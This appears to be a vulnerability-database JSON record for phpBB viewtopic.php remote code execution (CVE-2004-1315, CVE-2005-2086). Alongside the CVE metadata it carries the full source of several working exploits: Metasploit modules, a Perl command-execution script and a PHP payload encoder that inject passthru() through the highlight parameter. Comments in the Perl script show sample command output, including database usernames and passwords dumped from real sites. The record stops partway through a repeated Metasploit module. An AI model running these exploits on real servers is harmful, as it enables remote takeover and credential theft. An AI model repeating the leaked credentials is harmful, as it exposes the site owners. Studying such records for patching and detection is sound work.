{"cve": [{"lastseen": "2021-02-02T05:22:59", "description": "viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which is then processed by PHP exec, as exploited by the Santy.A worm.", "edition": 4, "cvss3": {}, "published": "2004-11-12T05:00:00", "title": "CVE-2004-1315", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-1315"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/a:phpbb_group:phpbb:2.0_rc4", "cpe:/a:phpbb_group:phpbb:2.0.0", "cpe:/a:phpbb_group:phpbb:2.0.9", "cpe:/a:phpbb_group:phpbb:2.0.8a", "cpe:/a:phpbb_group:phpbb:2.0_rc1", "cpe:/a:phpbb_group:phpbb:2.0.6d", "cpe:/a:phpbb_group:phpbb:2.0.3", "cpe:/a:phpbb_group:phpbb:2.0.1", "cpe:/a:phpbb_group:phpbb:*", "cpe:/a:phpbb_group:phpbb:1.4.1", "cpe:/a:phpbb_group:phpbb:1.0.1", "cpe:/a:phpbb_group:phpbb:2.0_beta1", "cpe:/a:phpbb_group:phpbb:2.0.5", "cpe:/a:phpbb_group:phpbb:1.4.2", "cpe:/a:phpbb_group:phpbb:2.0.6c", "cpe:/a:phpbb_group:phpbb:2.0.8", "cpe:/a:phpbb_group:phpbb:2.0.6", "cpe:/a:phpbb_group:phpbb:1.4.4", "cpe:/a:phpbb_group:phpbb:2.0.4", "cpe:/a:phpbb_group:phpbb:2.0_rc2", "cpe:/a:phpbb_group:phpbb:1.2.0", "cpe:/a:phpbb_group:phpbb:1.0.0", "cpe:/a:phpbb_group:phpbb:2.0.7a", "cpe:/a:phpbb_group:phpbb:2.0_rc3", "cpe:/a:phpbb_group:phpbb:2.0.7", "cpe:/a:phpbb_group:phpbb:2.0.2", "cpe:/a:phpbb_group:phpbb:2.0.10", "cpe:/a:phpbb_group:phpbb:1.4.0", "cpe:/a:phpbb_group:phpbb:1.2.1"], "id": "CVE-2004-1315", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1315", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpbb_group:phpbb:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.8a:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:*:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0_rc4:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0_beta1:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.7a:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0_rc3:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.6d:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0_rc1:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.6c:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_group:phpbb:2.0.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:24:37", "description": "PHP remote file inclusion vulnerability in viewtopic.php in phpBB 2.0.15 and earlier allows remote attackers to execute arbitrary PHP code.", "edition": 4, "cvss3": {}, "published": "2005-07-05T04:00:00", "title": "CVE-2005-2086", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2086"], "modified": "2016-10-18T03:24:00", "cpe": ["cpe:/a:phpbb_group:phpbb:2.0.15"], "id": "CVE-2005-2086", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2086", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpbb_group:phpbb:2.0.15:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T06:45:40", "description": "phpBB viewtopic.php Arbitrary Code Execution. CVE-2004-1315,CVE-2005-2086. Webapps exploit for php platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "phpBB viewtopic.php Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315", "CVE-2005-2086"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16890", "href": "https://www.exploit-db.com/exploits/16890/", "sourceData": "##\r\n# $Id: phpbb_highlight.rb 9671 2010-07-03 06:21:31Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits two arbitrary PHP code execution flaws in the\r\n\t\t\t\tphpBB forum system. The problem is that the 'highlight' parameter\r\n\t\t\t\tin the 'viewtopic.php' script is not verified properly and will\r\n\t\t\t\tallow an attacker to inject arbitrary code via preg_replace().\r\n\r\n\t\t\t\tThis vulnerability was introduced in revision 3076, and finally\r\n\t\t\t\tfixed in revision 5166. According to the \"tags\" within their tree,\r\n\t\t\t\tthis corresponds to versions 2.0.4 through 2.0.15 (inclusive).\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9671 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-2086'],\r\n\t\t\t\t\t[ 'CVE', '2004-1315'],\r\n\t\t\t\t\t[ 'OSVDB', '11719'],\r\n\t\t\t\t\t[ 'OSVDB', '17613'],\r\n\t\t\t\t\t[ 'BID', '14086'],\r\n\t\t\t\t\t[ 'BID', '10701'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', \t\t{ }],\r\n\t\t\t\t\t[ 'phpbb <=2.0.10', \t{ }],\r\n\t\t\t\t\t[ 'phpbb <=2.0.15', \t{ }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 12 2004',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URI', [true, \"The phpBB root Directory\", \"/phpBB2\"]),\r\n\t\t\t\tOptString.new('TOPIC', [false, \"The ID of a valid topic\"]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef find_topic\r\n\r\n\t\t1.upto(32) do |x|\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t\t'uri'\t=> datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,\r\n\t\t\t}, 25)\r\n\r\n\t\tif (res and res.body.match(/class=\"postdetails\"/))\r\n\t\t\tprint_status(\"Discovered valid topic ID: #{x}\")\r\n\t\t\treturn x\r\n\t\tend\r\n\r\n\t\tend\r\n\t\treturn false\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\ttopic = datastore['TOPIC'] || find_topic\r\n\r\n\t\tif !(topic)\r\n\t\t\tprint_status(\"No valid topic ID found, please specify the TOPIC option.\")\r\n\t\t\treturn\r\n\t\telse\r\n\r\n\t\t\tsploit = datastore['URI'] + \"/viewtopic.php?t=#{topic}&highlight=\"\r\n\r\n\t\t\tcase target.name\r\n\t\t\twhen /Automatic/\r\n\t\t\t\treq = \"/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527\"\r\n\r\n\t\t\t\tres = send_request_raw({\r\n\t\t\t\t'uri'\t=> datastore['URI'] + req\r\n\t\t\t\t}, 25)\r\n\r\n\t\t\t\tprint_status(\"Trying to determine which attack method to use...\")\r\n\r\n\t\t\t\tif (res and res.body =~ /\\<title>phpinfo/)\r\n\t\t\t\t\tbyte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('%252e')\r\n\t\t\t\t\tsploit << \"%2527%252epassthru(#{byte})%252e%2527\"\r\n\t\t\t\telse\r\n\t\t\t\t\tbyte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('.')\r\n\t\t\t\t\tsploit << \"%27.passthru(#{byte}).%27\"\r\n\t\t\t\tend\r\n\r\n\t\t\twhen /2\\.0\\.10/\r\n\t\t\t\tbyte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('%252e')\r\n\t\t\t\tsploit << \"%2527%252epassthru(#{byte})%252e%2527\"\r\n\t\t\twhen /2\\.0\\.15/\r\n\t\t\t\tbyte = payload.encoded.unpack('C*').map! { |ch| ch = \"chr(#{ch})\" }.join('.')\r\n\t\t\t\tsploit << \"%27.passthru(#{byte}).%27\"\r\n\t\t\tend\r\n\r\n\t\t\tres = send_request_raw({\r\n\t\t\t'uri'\t=> sploit\r\n\t\t\t}, 25)\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16890/"}, {"lastseen": "2016-01-31T12:36:15", "description": "phpBB <= 2.0.10 Remote Command Execution Exploit. CVE-2004-1315. Webapps exploit for php platform", "published": "2004-11-22T00:00:00", "type": "exploitdb", "title": "phpBB <= 2.0.10 - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315"], "modified": "2004-11-22T00:00:00", "id": "EDB-ID:647", "href": "https://www.exploit-db.com/exploits/647/", "sourceData": "#!/usr/bin/perl\r\n\r\nuse IO::Socket;\r\n\r\n## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@\r\n## @@! @@@ @@! @@@ !@@ @@! @@@\r\n## @!@!!@! @!@ !@! !@@!! @!@!@!@!\r\n## !!: :!! !!: !!! !:! !!: !!!\r\n## : : : :.:: : ::.: : : : :\r\n##\r\n## phpBB <= 2.0.10 remote commands exec exploit\r\n## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0\r\n## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10\r\n## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n## example...\r\n## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819\r\n## The third issue, search highlighting, has been checked by us several times and we can do \r\n## nothing with it at all. Again, that particular group admit likewise. In a future release \r\n## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our \r\n## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to \r\n## be cause for an immediate release.\r\n## heh...\r\n##\r\n## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 \"ls -la\"\r\n## *** CMD: [ ls -la ]\r\n## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n## total 507\r\n## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .\r\n## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..\r\n## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS\r\n## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin\r\n## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache\r\n## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php\r\n## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php\r\n## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php\r\n## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db\r\n## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs\r\n## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc\r\n## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php\r\n## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files\r\n## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php\r\n## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images\r\n## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes\r\n## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php\r\n## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language\r\n## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php\r\n## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php\r\n## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php\r\n## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php\r\n## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php\r\n## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php\r\n## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php\r\n## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php\r\n## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php\r\n## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates\r\n## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php\r\n## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php\r\n## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php\r\n## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 \"cat config.php\"\r\n## *** CMD: [ cat config.php ]\r\n## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n## $dbms = \"mysql\";\r\n## $dbhost = \"localhost\";\r\n## $dbname = \"phpbb\";\r\n## $dbuser = \"phpbb\";\r\n## $dbpasswd = \"phpBB_R0cKs\";\r\n## $table_prefix = \"phpbb_\";\r\n## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n## rocksss.... \r\n##\r\n## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...\r\n## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n## fucking lamaz...\r\n##\r\n## ccteam.ru\r\n## $dbname = \"ccteam_phpbb2\";\r\n## $dbuser = \"ccteam_userphpbb\";\r\n## $dbpasswd = \"XCbRsoy1\";\r\n##\r\n## eat this dude...\r\n## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nif (@ARGV < 4)\r\n {\r\n print q(############################################################\r\n phpBB <=2.0.10 remote command execution exploit\r\n by RusH security team // www.rst.void.ru\r\n############################################################\r\n usage:\r\n r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]\r\n params:\r\n [URL] - server url e.g. www.phpbb.com\r\n [DIR] - directory where phpBB installed e.g. /phpBB/ or /\r\n [NUM] - number of existing topic\r\n [CMD] - command for execute e.g. ls or \"ls -la\" \r\n############################################################\r\n ); \r\n exit;\r\n }\r\n\r\n$serv = $ARGV[0];\r\n$dir = $ARGV[1];\r\n$topic = $ARGV[2];\r\n$cmd = $ARGV[3];\r\n\r\n$serv =~ s/(http:\\/\\/)//eg;\r\nprint \"*** CMD: [ $cmd ]\\r\\n\";\r\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\";\r\n\r\n$cmd=~ s/(.*);$/$1/eg;\r\n$cmd=~ s/(.)/\"%\".uc(sprintf(\"%2.2x\",ord($1)))/eg;\r\n$topic=~ s/(.)/\"%\".uc(sprintf(\"%2.2x\",ord($1)))/eg;\r\n\r\n$path = $dir;\r\n$path .= 'viewtopic.php?t=';\r\n$path .= $topic;\r\n$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';\r\n$path .= $cmd;\r\n$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';\r\n$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';\r\n\r\n$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$serv\", PeerPort => \"80\") || die \"[-] CONNECT FAILED\\r\\n\";\r\n\r\nprint $socket \"GET $path HTTP/1.1\\n\";\r\nprint $socket \"Host: $serv\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\n\r\n$on = 0;\r\n\r\nwhile ($answer = <$socket>)\r\n{\r\nif ($answer =~ /^_END_/) { print \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\"; exit(); }\r\nif ($on == 1) { print \" $answer\"; }\r\nif ($answer =~ /^_START_/) { $on = 1; }\r\n}\r\n\r\nprint \"[-] EXPLOIT FAILED\\r\\n\";\r\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\";\r\n\r\n### EOF ###\n\n# milw0rm.com [2004-11-22]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/647/"}, {"lastseen": "2016-02-02T22:54:45", "description": "phpBB 2.0.x Viewtopic.PHP PHP Script Injection Vulnerability. CVE-2004-1315. Webapps exploit for php platform", "published": "2004-07-12T00:00:00", "type": "exploitdb", "title": "phpBB 2.0.x Viewtopic.PHP PHP Script Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315"], "modified": "2004-07-12T00:00:00", "id": "EDB-ID:24274", "href": "https://www.exploit-db.com/exploits/24274/", "sourceData": "source: http://www.securityfocus.com/bid/10701/info\r\n\r\nThe 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to construct dynamically generated web pages.\r\n\r\nExploiting this issue may allow a remote attacker to execute arbitrary commands in the context of the webserver that is hosting the vulnerable software. \r\n\r\n<?\r\n$rush='ls -al'; //do what\r\n$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch\r\n\r\nprint \"?t=%37&rush=\";\r\n\r\nfor ($i=0; $i<strlen($rush); ++$i) {\r\n print '%' . bin2hex(substr($rush,$i,1));\r\n}\r\n\r\nprint \"&highlight=%2527.\";\r\n\r\nfor ($i=0; $i<strlen($highlight); ++$i) {\r\n prt '%' . bin2hex(substr($highlight,$i,1));\r\n}\r\n\r\nprint \".%2527\";\r\n?>\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24274/"}, {"lastseen": "2016-01-31T13:34:33", "description": "phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit). CVE-2005-2086. Webapps exploit for php platform", "published": "2005-07-19T00:00:00", "type": "exploitdb", "title": "phpBB 2.0.15 - Remote PHP Code Execution Exploit metasploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2086"], "modified": "2005-07-19T00:00:00", "id": "EDB-ID:1113", "href": "https://www.exploit-db.com/exploits/1113/", "sourceData": "##\r\n# Title: phpBB 2.0.15 arbitrary command execution eXploit\r\n# Name: php_phpbb2_0_15.pm\r\n# License: Artistic/BSD/GPL\r\n# Info: Coded because of boredom.\r\n#\r\n# - This is an exploit module for the Metasploit Framework, please see\r\n# http://metasploit.com/projects/Framework for more information.\r\n##\r\n\r\npackage Msf::Exploit::php_phpbb2_0_15;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\nuse bytes;\r\n\r\nmy $advanced = { };\r\n\r\nmy $info = {\r\n 'Name' => 'phpBB 2.0.15 arbitrary command execution eXploit',\r\n 'Version' => '$Revision: 1.0 $',\r\n 'Authors' => [ 'str0ke <str0ke [at] milw0rm.com> [Artistic/GPL]' ],\r\n 'Arch' => [ ],\r\n 'OS' => [ ],\r\n 'Priv' => 0,\r\n 'UserOpts' =>\r\n {\r\n 'RHOST' => [1, 'ADDR', 'The target address'],\r\n 'RPORT' => [1, 'PORT', 'The target port', 80],\r\n 'VHOST' => [0, 'DATA', 'The virtual host name of the server'],\r\n 'RPATH' => [1, 'DATA', 'Path to the viewtopic script', '/phpBB2/viewtopic.php'],\r\n 'TOPIC' => [1, 'DATA', 'viewtopic id', '1'],\r\n 'SSL' => [0, 'BOOL', 'Use SSL'],\r\n },\r\n\r\n 'Description' => Pex::Text::Freeform(qq{\r\n This module exploits an arbitrary code execution flaw in phpbb 2.0.15.\r\n}),\r\n\r\n 'Refs' =>\r\n [\r\n ['MIL', '1113'],\r\n ],\r\n\r\n 'Payload' =>\r\n {\r\n 'Space' => 512,\r\n 'Keys' => ['cmd', 'cmd_bash'],\r\n },\r\n\r\n 'Keys' => ['phpbb'],\r\n };\r\n\r\nsub new {\r\n my $class = shift;\r\n my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n return($self);\r\n}\r\n\r\nsub Exploit {\r\n my $self = shift;\r\n my $target_host = $self->GetVar('RHOST');\r\n my $target_port = $self->GetVar('RPORT');\r\n my $vhost = $self->GetVar('VHOST') || $target_host;\r\n my $path = $self->GetVar('RPATH');\r\n my $topic = $self->GetVar('TOPIC');\r\n my $cmd = $self->GetVar('EncodedPayload')->RawPayload;\r\n\r\n # Encode the command as a set of chr() function calls\r\n my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));\r\n\r\n # Create the phpBB get request data\r\n my $data = \"?t=$topic&highlight=%27.\".\r\n \"passthru($byte)\".\r\n \".%27\";\r\n\r\n my $req =\r\n \"GET $path$data HTTP/1.1\\r\\n\".\r\n \"Host: $vhost:$target_port\\r\\n\".\r\n \"Content-Type: application/html\\r\\n\".\r\n \"Content-Length: \". length($data).\"\\r\\n\".\r\n \"Connection: Close\\r\\n\".\r\n \"\\r\\n\";\r\n\r\n my $s = Msf::Socket::Tcp->new(\r\n 'PeerAddr' => $target_host,\r\n 'PeerPort' => $target_port,\r\n 'LocalPort' => $self->GetVar('CPORT'),\r\n 'SSL' => $self->GetVar('SSL'),\r\n );\r\n\r\n if ($s->IsError){\r\n $self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n return;\r\n }\r\n\r\n $self->PrintLine(\"[*] Sending the malicious phpBB Get request...\");\r\n\r\n $s->Send($req);\r\n\r\n my $results = $s->Recv(-1, 20);\r\n $s->Close();\r\n\r\n return;\r\n}\r\n\r\n1;\n\n# milw0rm.com [2005-07-19]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1113/"}], "packetstorm": [{"lastseen": "2016-12-05T22:11:57", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "phpBB viewtopic.php Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315", "CVE-2005-2086"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82367", "href": "https://packetstormsecurity.com/files/82367/phpBB-viewtopic.php-Arbitrary-Code-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'phpBB viewtopic.php Arbitrary Code Execution', \n'Description' => %q{ \nThis module exploits two arbitrary PHP code execution flaws in the \nphpBB forum system. The problem is that the 'highlight' parameter \nin the 'viewtopic.php' script is not verified properly and will \nallow an attacker to inject arbitrary code via preg_replace(). \n}, \n'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-2086'], \n[ 'CVE', '2004-1315'], \n[ 'OSVDB', '11719'], \n[ 'OSVDB', '17613'], \n[ 'BID', '14086'], \n[ 'BID', '10701'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 1024, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl ruby bash telnet', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n[ 'Automatic', { }], \n[ 'phpbb <=2.0.10', { }], \n[ 'phpbb <=2.0.15', { }], \n], \n'DisclosureDate' => 'Nov 12 2004', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URI', [true, \"The phpBB root Directory\", \"/phpBB2\"]), \nOptString.new('TOPIC', [false, \"The ID of a valid topic\"]), \n], self.class) \nend \n \ndef find_topic \n \n1.upto(32) do |x| \n \nres = send_request_raw({ \n'uri' => datastore['URI'] + '/viewtopic.php?topic=' + x.to_s, \n}, 25) \n \nif (res and res.body.match(/class=\"postdetails\"/)) \nprint_status(\"Discovered valid topic ID: #{x}\") \nreturn x \nend \n \nend \nreturn false \n \nend \n \ndef exploit \n \ntopic = datastore['TOPIC'] || find_topic \n \nif !(topic) \nprint_status(\"No valid topic ID found, please specify the TOPIC option.\") \nreturn \nelse \n \nsploit = datastore['URI'] + \"/viewtopic.php?t=#{topic}&highlight=\" \n \ncase target.name \nwhen /Automatic/ \nreq = \"/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527\" \n \nres = send_request_raw({ \n'uri' => datastore['URI'] + req \n}, 